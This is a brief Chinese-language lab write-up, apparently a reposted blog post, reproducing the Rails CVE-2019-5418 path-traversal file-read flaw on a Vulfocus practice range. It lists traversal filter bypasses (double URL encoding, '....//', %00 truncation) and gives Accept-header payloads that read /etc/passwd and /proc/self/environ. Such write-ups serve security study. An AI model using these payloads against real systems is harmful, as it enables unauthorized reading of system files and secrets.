【漏洞复现-rails-文件读取】vulfocus/rails-cve_2019_5418

目录

一、靶场环境

1.1、平台:

1.2、知识:

1.3、描述:

二、漏洞验证

2.1、分析:


一、靶场环境

1.1、平台:

Vulfocus 漏洞威胁分析平台

123.58.224.8:60715

1.2、知识:

1、跳目录

../上一级

(有时候可能需要考虑绕过过滤)

单次过滤:....//

正则匹配斜杠:..%252f(双重URL编码,因为浏览器会解码一次)

起始路径匹配:起始路径+相对路径结合绕过

后缀检测:空字节绕过(%00截断)../etc/passwd%00.png

……

1.3、描述:

在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置

通过传入Accept: ../../../../../../../../etc/passwd{ {头来构成构造路径穿越漏洞,读取任意文件



二、漏洞验证

2.1、分析:

刷新,抓包

发到repeater

修改一:

在chybeta文件下

所以请求路径改为/chybeta

修改二:

Accept: ../../../../../../../../proc/self/environ{ {

猜你喜欢

转载自blog.csdn.net/qq_53079406/article/details/127334435